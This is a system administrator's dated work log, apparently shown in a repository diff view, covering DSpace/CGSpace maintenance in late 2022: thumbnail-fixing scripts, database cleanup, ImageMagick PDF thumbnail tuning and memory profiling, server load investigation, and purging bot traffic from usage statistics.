at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
at com.sun.proxy.$Proxy186.service(Unknown Source)
at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:750)
```
- So this is a broken side effect from the `org.apache.cocoon.uploads.autosave=false` change I made a few weeks ago
- Importing the CSV via the command line works fine
## 2022-10-04
- I stumbled across more low-quality thumbnails on CGSpace
- Some have the description "Generated Thumbnail", and others are manually uploaded ".jpg.jpg" ones...
- I want to develop some more thumbnail fixer scripts to the cgspace-java-helpers suite:
- If an item has an `IM Thumbnail` and a `Generated Thumbnail` in the `THUMBNAIL` bundle, remove the `Generated Thumbnail`
- If an item has a PDF bitstream and a JPG bitstream with description /thumbnail/ in the ORIGINAL bundle, remove the /thumbnail/ bitstream in the ORIGINAL bundle and try to remove the /thumbnail/.jpg bitstream in the THUMBNAIL bundle
## 2022-10-05
- I updated the [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) to include a new `FixLowQualityThumbnails` script to detect the low-quality thumbnails I found above
- Add missing ORCID identifier for an Alliance author
- I've been running the `dspace cleanup -v` script every few weeks or months on CGSpace and assuming it finished successfully because I didn't get a error on the stdout/stderr, but today I noticed that the script keeps saying it is deleting the same bitstreams
- I looked in dspace.log and found the error I used to see a lot:
```console
Caused by: org.postgresql.util.PSQLException: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
Detail: Key (uuid)=(99b76ee4-15c6-458c-a940-866148bc7dee) is still referenced from table "bundle".
```
- If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more
- I ended up with a long list of UUIDs to fix before the script would complete:
```console
$ psql -d dspace -c "update bundle set primary_bitstream_id=NULL where primary_bitstream_id in ('b76d41c0-0a02-4f53-bfde-a840ccfff903','1981efaa-eadb-46cd-9d7b-12d7a8cff4c4','97a8b1fa-3c12-4122-9c7b-fc2a3eaf570d','99b76ee4-15c6-458c-a940-866148bc7dee','f330fc22-a787-46e2-b8d0-64cc3e166124','592f4a0d-1ed5-4663-be0e-958c0d3e653b','e73b3178-8f29-42bc-bfd1-1a454903343c','e3a5f592-ac23-4934-a2b2-26735fac0c4f','73f4ff6c-6679-44e8-8cbd-9f28a1df6927','11c9a75c-17a6-4966-a4e8-a473010eb34c','155faf93-92c5-4c17-866e-1db50b1f9687','8e073e9e-ab54-4d99-971a-66de073d51e3','76ddd62c-6499-4a8c-beea-3fc8c60200d8','2850fcc9-f450-430a-9317-c42def74e813','8fef3198-2aea-4bd8-aeab-bf5fccb46e42','9e3c3528-e20f-4da3-a0bd-ae9b8515b770')"
```
## 2022-10-06
- I finished running the cleanup script on CGSpace and the before and after on the number of bitstreams is interesting:
```console
$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
181094
$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
178329
```
- So that cleaned up ~2,700 bitstreams!
- Interesting, someone on the DSpace Slack mentioned this as being a known issue with discussion, reproducers, and a pull request: https://github.com/DSpace/DSpace/issues/7348
- I am having an issue with the new FixLowQualityThumbnails script on some communities like 10568/117865 and 10568/97114
- For some reason it doesn't descend into the collections
- Also, my old FixJpgJpgThumbnails doesn't either... weird
- I might have to resort to getting a list of collections and doing it that way:
```console
$ psql -h localhost -U postgres -d dspacetest -c 'SELECT ds6_collection2collectionhandle(uuid) FROM collection WHERE uuid in (SELECT uuid FROM collection);' |
sed 1,2d |
tac |
sed 1,3d > /tmp/collections
```
- Strange, I don't think doing it by collections is actually working because it says it's replacing the bitstreams, but it doesn't actually do it
- I don't have time to figure out what's happening, because I see "update_item" in dspace.log when the script says it's doing it, but it doesn't do it
- I might just extract a list of items that have .jpg.jpg thumbnails from the database and run the script through item mode
- There might be a problem with the context commit logic...?
- I exported a list of items that have .jpg.jpg thumbnails on CGSpace:
```console
$ psql -h localhost -p 5432 -U postgres -d dspacetest -c "SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE text_value ~ '.*\.(jpg|jpeg|JPG|JPEG)\.(jpg|jpeg|JPG|JPEG)' AND dspace_object_id IS NOT NULL;" |
sed 1,2d |
tac |
sed 1,3d |
grep -v '␀' |
sort -u |
sed 's/ //' > /tmp/jpgjpg-handles.txt
```
- I restarted DSpace Test because it had high load since yesterday and I don't know why
- Run `check-duplicates.py` on the 1642 MARLO Innovations to try to include matches from the OICRs we uploaded last month
- Then I processed those matches like I did with the OICRs themselves last month, and then cleaned them one last time with csv-metadata-quality, created a SAF bundle, and uploaded them to CGSpace
- BTW this bumps CGSpace over 100,000 items...
- Then I did the same for the 749 MARLO MELIAs and imported them to CGSpace
- Meeting about CG Core types with Abenet, Marie-Angelique, Sara, Margarita, and Valentina
- I made some minor logic changes to the FixJpgJpgThumbnails script in cgspace-java-helpers
- Now it checks to make sure the bitstream description is not empty or null, and also excludes Maps (in addition to Infographics) since those are likely to be JPEG files in the ORIGINAL bundle on purpose
## 2022-10-07
- I did the matching and cleaning on the 512 MARLO Policies and uploaded them to CGSpace
- I sent a list of the IDs and Handles for all four groups of MARLO items to Jose so he can do the redirects on their server:
```console
$ wc -l /tmp/*mappings.csv
1643 /tmp/crp-innovation-mappings.csv
750 /tmp/crp-melia-mappings.csv
683 /tmp/crp-oicr-mappings.csv
513 /tmp/crp-policy-mappings.csv
3589 total
```
- I fixed the mysterious issue with my cgspace-java-helpers scripts not working on communities and collections
- It was because the code wasn't committing the context!
- I ran both `FixJpgJpgThumbnails` and `FixLowQualityThumbnails` on a dozen or so large collections on CGSpace and processed about 1,200 low-quality thumbnails
- I did a complete re-sync of CGSpace to DSpace Test
## 2022-10-08
- Start a harvest on AReS
- Experiment with PDF thumbnails in ImageMagick again, I found an [interesting reference on their legacy website](https://legacy.imagemagick.org/Usage/thumbnails/) saying we can use `-unsharp` after `-thumbnail` to make them less blurry
- There are a few examples for unsharp values (starting from a DSpace default of a flattened JPEG from the PDF, then the thumbnail in a second operation:
```console
$ convert '10568-103447.pdf[0]' -flatten 10568-103447-dspace-step1.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x.5 10568-103447-dspace-step2-600-unsharp.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 2x0.5+0.7+0 10568-103447-dspace-step2-600-unsharp2.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x0.75+0.75+0.008 10568-103447-dspace-step2-600-unsharp3.pdf.jpg
$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 1.5x1+0.7+0.02 10568-103447-dspace-step2-600-unsharp4.pdf.jpg
```
- I merged all the changes from `6_x-dev` to `6_x-prod` after having run them on DSpace Test for the last ten days
## 2022-10-11
- I put together the microsite for improving DSpace PDF thumbnails: https://github.com/alanorth/improved-dspace-thumbnails/
- I need to make the pull request to DSpace
- I also discussed the thumbnails with Dani in Addis
## 2022-10-12
- I submitted a pull request to DSpace 7 for the `-unsharp 0x0.5` change: https://github.com/DSpace/DSpace/pull/8515
- I did some tests on CGSpace and verified that MEL will indeed need admin permissions on every collection that they want to map to
- I had a call with Salem and he asked me about redirecting from some CRP duplicates that exist in both MELSpace and CGSpace
- We decided that the only way is to use an HTTP 301 redirect in the nginx web server, but I said that I'd check with CNRI to see if there was a way to do this within the Handle system
## 2022-10-13
- Disable the REST API cache on CGSpace temporarily to see if that fixes a strange problem we are seeing with listing publications on ilri.org
- Meeting with MEL, MARLO, and CG Core people to continue discussing `dcterms.type`
- I added the new MEL account to all the appropriate authorizations for Initiatives that ICARDA is involved in on CGSpace
- I still have to add the few that WorldFish is involved in
## 2022-10-14
- Abenet finalized adding the MEL user to all initiative collections on CGSpace
- Re-sync CGSpace to DSpace Test to get the new MEL user and authorizations
- I checked ilri.org and I see more publications for 2021 and earlier
- The results are still strange though because I only see a few for each year
## 2022-10-15
- I'm going to turn the REST API cache on CGSpace back on to see if the ilri.org publications thing gets broken again
- Start a harvest on AReS
## 2022-10-16
- The harvest on AReS finished but somehow there are 10,000 less items than the previous indexing... hmmm
- I don't see any hits from MELSpace there so I will start another harvest...
- After starting the harvesting the load on the server went up to 20 and UptimeRobot said CGSpace was down for three hours, sigh
- I stopped the harvesting and the load went down immediately
- I am trying to find a pattern with the load on Sundays
- I see this in the AReS backend logs:
```console
[Nest] 1 - 10/16/2022, 6:42:04 PM [HarvesterService] Starting Harvest =>0
[Nest] 1 - 10/16/2022, 6:42:07 PM [HarvesterService] Starting Harvest =>101555
[Nest] 1 - 10/16/2022, 6:42:10 PM [HarvesterService] Starting Harvest =>4936
```
- Which means MELSpace is having some issue
- I'm not sure what was going on on CGSpace yesterday, but the load was indeed very high according to Munin:
![CGSpace CPU load day](/cgspace-notes/2022/10/cpu-day.png)
- The pattern is clear on Sundays if you look at the past month:
![CGSpace CPU load month](/cgspace-notes/2022/10/cpu-month.png)
- I have yet to find an increased nginx request pattern correlating with the increased load, but looking back on the last year it seems something started happening around March, 2022, and also I start seeing CPU steal in July (red coming from the top of the graph):
![CGSpace CPU load year](/cgspace-notes/2022/10/cpu-year.png)
- The amount of CPU steal is very low if I look at it now, around 1 or 2 percent, but what's happening now reminds me of the mysterious load problems I had in 2019-03 that were due to CPU steal
- Salem said there was an issue with the sitemaps on MELSpace so that's why it wasn't working in AReS
- Load on CGSpace is low in the evening so I'll start a new AReS harvest
## 2022-10-18
- Start mapping the Initiative names on CGSpace to tne new short names from Enrico's spreadsheet
- Then I will update them for existing CGSpace items:
```console
$ ./ilri/fix-metadata-values.py -i 2022-10-18-update-initiatives.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.initiative -m 258 -t correct -d -n
```
- And later in the controlled vocabulary
- Apply some corrections to a few hundred items on CGSpace for Peter
- Meeting with Abenet, Sara, and Valentina about CG Core types
- We finished going over our list and agreed to send a message to concerned parties in our organizations for feedback by November 4th
- Next week we will continue doing the definitions
- Re-sync CGSpace to DSpace Test to get the latest Initiatives changes
- I also need to re-create the CIAT/Alliance TIP accounts so they can continue testing
- I re-created the tip-submit@cgiar.org and tip-approve@cgiar.org account on DSpace Test
- According to my notes:
- A user must be in the collection admin group in order to deposit via the REST API (not in the collection's "Submit" group, which is for normal submission)
- A user must be in the collection's "Accept/Reject/Edit Metadata" step in order to see and approve the item in the DSpace workflow
- I created a new "TIP test" collection under Alliance's community and added the users accordingly
- I think I'll be able to just add these two submit/approve users to the Alliance Admins and Alliance Editors groups once we're ready
## 2022-10-19
- I submitted a [bug report for the two-page portrait layout of some PDF thumbnails](https://bugs.ghostscript.com/show_bug.cgi?id=705994) on Ghostscript's bug tracker
- For reference, the thumbnail for PDFs like in [10568/116598](https://hdl.handle.net/10568/116598) looks like this:
![gs thumbnail](/cgspace-notes/2022/10/gs-10568-116598.pdf.jpg)
- In other news, I see `pdftocairo` from the poppler package produces a similar, though slightly prettier version of the thumbnail of that PDF:
![pdftocairo thumbnail]('/cgspace-notes/2022/10/pdftocairo-10568-116598.pdf.jpg)
- I used the command:
```console
$ pdftocairo -jpeg -singlefile -f 1 -l 1 -scale-to-x 640 -scale-to-y -1 10568-116598.pdf thumb
```
- The Ghostscript developers responded in a few minutes (!) and explained that PDFs can contain many different "boxes":
> PDF files can have multiple different 'Box' values; ArtBox, BleedBox, CropBox, MediaBox and TrimBox. The MediaBox is required the other boxes are optional, a given PDF page description must contain the MediaBox and may contain any or all of the others.
>
> By default Ghostscript uses the MediaBox to determine the size of the media. Other PDF consumers may exhibit other behaviours.
>
> The pages in your PDF file contain all of the Boxes. In the majority of cases the Boxes all contain the same values (which makes their inclusion pointless of course). But for page 1 they differ:
>
> /CropBox[594.375 0.0 1190.55 839.176]
> /MediaBox[0.0 0.0 1190.55 841.89]
>
> You can tell Ghostscript to use a different Box value for the media by using one of -dUseArtBox, -dUseBleedBox, -dUseCropBox, -dUseTrim,Box. If I specify -dUseCropBox then the file is rendered as you expect.
- I confirm that adding `-define pdf:use-cropbox=true` to the ImageMagick command produces a better thumbnail in this case
- We can check the boxes in a PDF using `pdfinfo` from the poppler package:
```console
$ pdfinfo -box data/10568-116598.pdf
Creator: Adobe InDesign 17.0 (Macintosh)
Producer: Adobe PDF Library 16.0.3
CreationDate: Tue Dec 7 12:44:46 2021 EAT
ModDate: Tue Dec 7 15:37:58 2021 EAT
Custom Metadata: no
Metadata Stream: yes
Tagged: no
UserProperties: no
Suspects: no
Form: none
JavaScript: no
Pages: 17
Encrypted: no
Page size: 596.175 x 839.176 pts
Page rot: 0
MediaBox: 0.00 0.00 1190.55 841.89
CropBox: 594.38 0.00 1190.55 839.18
BleedBox: 594.38 0.00 1190.55 839.18
TrimBox: 594.38 0.00 1190.55 839.18
ArtBox: 594.38 0.00 1190.55 839.18
File size: 572600 bytes
Optimized: no
PDF version: 1.6
```
- In this case the MediaBox is a strange size, and we should use the CropBox
- I wonder if we can check that from DSpace...
- Apply some corrections from Peter on CGSpace
- Meeting with Leroy, Daniel, Francesca, and Maria from Alliance to review their TIP tool and talk about next steps
- We asked them to do some real submissions (as opposed to "I like coffee" etc) to test the full breadth of the metadata and controlled vocabularies
- Minor work on the CG Core Types spreadsheet to clear up some of the actions and incorporate some of Peter's feedback
- After looking at the request patterns in nginx on CGSpace for the past few weeks I see nothing that would explain the high loads we see several times per week (especially Sundays!)
- So I suspect there is a noisy neighbor, and actually I do see some non-trivial amount of CPU steal in my Munin graphs and `iostat`
- I asked Linode to move the instance elsewhere
## 2022-10-22
- Start a harvest on AReS
## 2022-10-24
- Peter sent me some corrections for affiliations:
```console
$ cat 2022-10-24-affiliations.csv
cg.contributor.affiliation,correct
Wageningen University and Research Centre,Wageningen University & Research
Wageningen University and Research,Wageningen University & Research
Wageningen University,Wageningen University & Research
$ ./ilri/fix-metadata-values.py -i 2022-10-24-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
```
- Add ORCID identifier for Claudia Arndt on CGSpace and tag her existing items
- Linode responded to my request last week and said they don't think that the culprit here is CPU steal, but that they would move us to another host anyways
- I still need to check the Munin graphs
## 2022-10-25
- Upload some changes to items on CGSpace for Peter
- Start a full Discovery index on CGSpace:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 226m40.463s
user 132m6.511s
sys 3m15.077s
```
## 2022-10-26
- We published the [infographic](https://hdl.handle.net/10568/125167) and [blog post](https://www.ilri.org/news/celebrating-open-access-cgspace) to mark CGSpace's 100,000th item
- I generated a high-quality thumbnail using ImageMagick in order to Tweet it:
```console
$ convert -density 144 10568-125167.pdf\[0\] -thumbnail x1200 /tmp/10568-125167.pdf.png
$ pngquant /tmp/10568-125167.pdf.png
```
- Spent some time looking at the MediaBox / CropBox thing in DSpace's `ImageMagickThumbnailFilter.java`
- We need to make sure to put `-define pdf:use-cropbox=true` before we specify the input file or else it will not have any effect
## 2022-10-27
- I found out that we can use [pdfcpu to remove the CropBox from a PDF](https://pdfcpu.io/boxes/boxes_remove.html#examples) for testing:
```console
$ pdfcpu box rem -- "crop" in.pdf out.pdf
```
- I filed [an issue on DSpace](https://github.com/DSpace/DSpace/issues/8549) for the ImageMagick `CropBox` problem
- I decided that this is a bug that should be fixed separately from the "improving thumbnail quality" issue
- I made [a pull request](https://github.com/DSpace/DSpace/pull/8550) to fix the `CropBox` issue
- I did more work on my [improved-dspace-thumbnails](https://github.com/alanorth/improved-dspace-thumbnails/) microsite to complement the DSpace thumbnail pull requests
- I am updating it to recommend using the PDF cropbox and "supersampling" with a higher density than 72
- I measured execution time of ImageMagick with `time` and found that the higher-density mode takes about five times longer on average
- I measured the [maximum heap memory of ImageMagick with Valgrind and Massif](https://stackoverflow.com/a/131346):
```console
$ valgrind --tool=massif magick convert ...
```
- Then I checked the results for each set of default DSpace thumbnail runs and "improved" thumbnail runs using `ms_print` (hacky way to get the max heap, I know):
```console
$ for file in memory-dspace/massif.out.49*; do ms_print "$file" | grep -A1 " MB" | tail -n1 | sed 's/\^.*//'; done
15.87
16.06
21.26
15.88
20.01
15.85
20.06
16.04
15.87
15.87
20.02
15.87
15.86
19.92
10.89
$ for file in memory-improved/massif.out.5*; do ms_print "$file" | grep -A1 " MB" | tail -n1 | sed 's/\^.*//'; done
245.3
245.5
298.6
245.3
306.8
245.2
306.9
245.5
245.2
245.3
306.8
245.3
244.9
306.3
165.6
```
- Ouch, this shows that it takes about *fifteen times* more memory to do the "4x" density of 288!
- It seems more reasonable to use a "2x" density of 144:
```console
$ for file in memory-improved-144/*; do ms_print "$file" | grep -A1 " MB" | tail -n1 | sed 's/\^.*//'; done
61.80
62.00
76.76
61.82
77.43
61.77
77.48
61.98
61.76
61.81
77.44
61.81
61.69
77.16
41.84
```
- There's a really cool visualizer called massif-visualizer, but it isn't easy to parse
## 2022-10-28
- I finalized the code for the ImageMagick density change and made a [pull request](https://github.com/DSpace/DSpace/pull/8553) against DSpace 7.x
## 2022-10-29
- Start a harvest on AReS
## 2022-10-31
- Tag version 6.1 of cgspace-java-helpers: https://github.com/ilri/cgspace-java-helpers/releases/tag/v6.1
- I also pushed a more recent `6.1-SNAPSHOT` version to Maven Central via OSSRH
- I should probably push a non SNAPSHOT but I don't have time to figure that out in Maven
- Add some new items on CGSpace and update others for Peter
- Email Mishell from CIP about their [old theses](https://cgspace.cgiar.org/handle/10568/125218) which are using Creative Commons licenses
- They said it's OK so I updated all sixteen items in that collection
- Move the "MEL submissions" collection on CGSpace from ICARDA's community to the Initiatives community
- Meeting with Peter and Abenet about ongoing CGSpace action points
- I created the authorizations for Alliance's TIP tool to submit on CGSpace
<!-- vim: set sw=2 ts=2: -->

530
content/posts/2022-11.md Normal file
View File

@ -0,0 +1,530 @@
---
title: "November, 2022"
date: 2022-11-01T09:11:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-11-01
- Last night I re-synced DSpace 7 Test from CGSpace
- I also updated all my local `7_x-dev` branches on the latest upstreams
- I spent some time updating the authorizations in Alliance collections
- I want to make sure they use groups instead of individuals where possible!
- I reverted the Cocoon autosave change because it was more of a nuissance that Peter can't upload CSVs from the web interface and is a very low severity security issue
<!--more-->
- I ran FixLowQualityThumbnails from cgspace-java-helpers on some large collections on CGSpace and ended up fixing 194 items!
- I did some minor checking and uploaded twenty-four IFPRI outputs for the Initiatives to DSpace Test
- Tim merged my [pull request to override the ImageMagick PDF density in DSpace 7](https://github.com/DSpace/DSpace/pull/8553)
- I ported it to DSpace 6.x and submitted a pull request: https://github.com/DSpace/DSpace/pull/8560
## 2022-11-02
- I joined the FAOCGIAR AGROVOC results sharing meeting
- From June to October, 2022 we suggested 39 new keywords, added 27 to AGROVOC, 4 rejected, and 9 still under discussion
- Doing duplicate check on IFPRI's batch upload and I found one duplicate uploaded by IWMI earlier this year
- I will update the metadata of that item and map it to the correct Initiative collection
## 2022-11-03
- I added countries to the twenty-three IFPRI items in OpenRefine based on their titles and abstracts (using the Jython trick I learned a few months ago), then added regions using csv-metadata-quality, and uploaded them to CGSpace
- I exported a list of collections from CGSpace so I can run the thumbnail fixes on each, as we seem to have issues when doing it on (some) large communities like the CRP community:
```console
localhost/dspace= ☘ \COPY (SELECT ds6_collection2collectionhandle(uuid) AS collection FROM collection) to /tmp/collections.txt
COPY 1268
```
- Then I started a test run on DSpace Test:
```console
$ while read -r collection; do chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails $collection | tee -a /tmp/FixLowQualityThumbnails.log; done < /tmp/collections.txt
```
- I'll be curious to check the log after it's all done.
- After a few hours I see:
```console
$ grep -c 'Action: remove' /tmp/FixLowQualityThumbnails.log
626
```
- Not bad, because last week I did a more manual selection of collections and deleted ~200
- I will replicate this on CGSpace soon, and also try the FixJpgJpgThumbnails tool
- I see that the CIAT Library is still up, so I should really grab all the PDFs before they shut that old server down
- Export a list of items with PDFs linked there:
```console
localhost/dspacetest= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=219 AND text_value LIKE '%ciat-library%') to /tmp/ciat-library-items.csv;
COPY 4621
```
- After stripping the page numbers off I see there are only about 2,700 unique files, and we have to filter the dead JSPUI ones...
```console
$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | grep -v jspui | sort -u | wc -l
2752
```
- I'm not sure how we'll handle the duplicates because many items are book chapters or something where they share a PDF
## 2022-11-04
- I decided to check for old pre-ImageMagick thumbnails on CGSpace by finding any bitstreams with the description "Generated Thumbnail":
```console
localhost/dspacetest= ☘ \COPY (SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND text_value='Generated Thumbnail') to /tmp/old-thumbnails.txt;
COPY 1147
$ grep -v '\\N' /tmp/old-thumbnails.txt > /tmp/old-thumbnail-handles.txt
$ wc -l /tmp/old-thumbnail-handles.txt
987 /tmp/old-thumbnail-handles.txt
```
- A bunch of these have `\N` for some reason when I use the `ds6_bitstream2itemhandle` function to get their handles so I had to exclude those...
- I forced the media-filter for these items on CGSpace:
```console
$ while read -r handle; do JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i $handle -f -v; done < /tmp/old-thumbnail-handles.txt
```
- Upload some batch records via CSV for Peter
- Update the about page on CGSpace with new text from Peter
- Add a few more ORCID identifiers and names to my growing file `2022-09-22-add-orcids.csv`
- I tagged fifty-four new authors using this list
- I deleted and mapped one duplicate item for Maria Garruccio
- I updated the CG Core website from Bootstrap v4.6 to v5.2
## 2022-11-07
- I did a harvest on AReS last night but it seems that MELSpace's sitemap is broken again because we have 10,000 fewer records
- I filed [an issue](https://github.com/ecrmnn/iso-3166-1/issues/10) on the iso-3166-1 npm package to update the name of Turkey to Türkiye
- I also filed [an issue](https://github.com/flyingcircusio/pycountry/issues/148) and [a pull request](https://github.com/flyingcircusio/pycountry/pull/149) on the pycountry package
- I also filed [an issue](https://github.com/konstantinstadler/country_converter/issues/121) and [a pull request](https://github.com/konstantinstadler/country_converter/pull/122) on the country-converter package
- I also changed one item on CGSpace that had been submitted since the name was changed
- I also imported the new iso-codes 4.12.0 into cgspace-java-helpers
- I also updated it in the DSpace `input-forms.xml`
- I also forked the iso-3166-1 package from npm and updated Swaziland, Macedonia, and Turkey in my fork
- I submitted a [pull request](https://github.com/ecrmnn/iso-3166-1/pull/11) to update this upstream
- Since I was making all these pull requests I also made [one on country-converter for the UN M.49 region "South-eastern Asia"](https://github.com/konstantinstadler/country_converter/pull/123)
- Port the [ImageMagick PDF cropbox fix](https://github.com/DSpace/DSpace/pull/8550) to DSpace 6.x
- I deployed it on CGSpace, ran all updates, and rebooted the host
- I ran the filter-media script on one large collection where many of these PDFs with cropbox issues exist:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v -f -i 10568/78 >& /tmp/filter-media-cropbox.log
```
- But looking at the items it processed, I'm not sure it's working as expected
- I looked at a few dozen
- I found some links to the Bioversity website on CGSpace that are not redirecting properly:
```console
$ http --print Hh http://www.bioversityinternational.org/nc/publications/publication/issue/geneflow_2004.html
GET /nc/publications/publication/issue/geneflow_2004.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: www.bioversityinternational.org
User-Agent: HTTPie/3.2.1
HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Nov 2022 16:35:21 GMT
Keep-Alive: timeout=15, max=100
Location: https://www.bioversityinternational.orgnc/publications/publication/issue/geneflow_2004.html
Server: Apache
```
- The `Location` header is clearly wrong, and if I try https directly I get an HTTP 500
## 2022-11-08
- Looking at the Solr statistics hits on CGSpace for 2022-11
- I see 221.219.100.42 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent
- I see 122.10.101.60 is in Hong Kong and making thousands of requests to XMLUI handles in a few hours, using a normal user agent
- I see 135.125.21.38 on OVH is making thousands of requests trying to do SQL injection
- I see 163.237.216.11 is somewhere in California making thousands of requests with a normal user agent
- I see 51.254.154.148 on OVH is making thousands of requests trying to do SQL injection
- I see 221.219.103.211 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent
- I see 216.218.223.53 on Hurricane Electric making thousands of requests to XMLUI in a few minutes using a normal user agent
- I will purge all these hits and proably add China Unicom's subnet mask to my nginx `bot-network.conf` file to tag them as bots since there are SO many bad and malicious requests coming from there
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 8975 hits from 221.219.100.42 in statistics
Purging 7577 hits from 122.10.101.60 in statistics
Purging 6536 hits from 135.125.21.38 in statistics
Purging 23950 hits from 163.237.216.11 in statistics
Purging 4093 hits from 51.254.154.148 in statistics
Purging 2797 hits from 221.219.103.211 in statistics
Purging 2618 hits from 216.218.223.53 in statistics
Total number of bot hits purged: 56546
```
- Also interesting to see a few new user agents:
- `RStudio Desktop (2022.7.1.554); R (4.2.1 x86_64-w64-mingw32 x86_64 mingw32)`
- `rstudio.cloud R (4.2.1 x86_64-pc-linux-gnu x86_64 linux-gnu)`
- `MEL`
- `Gov employment data scraper ([[your email]])`
- `RStudio Desktop (2021.9.0.351); R (4.1.1 x86_64-w64-mingw32 x86_64 mingw32)`
- I will purge all these:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
Purging 6155 hits from RStudio in statistics
Purging 1929 hits from rstudio in statistics
Purging 1454 hits from MEL in statistics
